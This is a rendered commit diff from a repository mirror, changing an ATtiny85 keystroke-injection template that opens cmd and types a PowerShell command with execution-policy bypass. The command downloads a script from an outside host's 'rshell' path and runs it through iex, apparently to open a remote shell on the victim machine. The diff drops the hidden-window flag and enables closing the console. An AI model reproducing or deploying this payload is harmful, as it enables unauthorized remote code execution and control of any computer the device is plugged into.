Projects STRLCPY Synergy-httpx Commits 33874978
🤬
  • ■ ■ ■ ■ ■ ■
    ATtiny85_templates/http_iex_powershell.ino
    skipped 13 lines
    14 14   DigiKeyboard.print("cmd");
    15 15   DigiKeyboard.sendKeyStroke(KEY_ENTER);
    16 16   DigiKeyboard.delay(2300);
    17  - DigiKeyboard.print(F("powershell -NoP -W Hidden -ep Bypass \"irm -Uri https://t3l3machus.com/rshell:443 | iex\""));
     17 + DigiKeyboard.print(F("powershell -NoP -ep Bypass \" irm -Uri https://t3l3machus.com:443/rshell | iex\""));
    18 18   DigiKeyboard.sendKeyStroke(KEY_ENTER);
    19  - //DigiKeyboard.print("exit");
    20  - //DigiKeyboard.sendKeyStroke(KEY_ENTER);
     19 + DigiKeyboard.print("exit");
     20 + DigiKeyboard.sendKeyStroke(KEY_ENTER);
    21 21   for(;;){ }
    22 22  }
    23 23   
Please wait...
Page is in error, reload to recover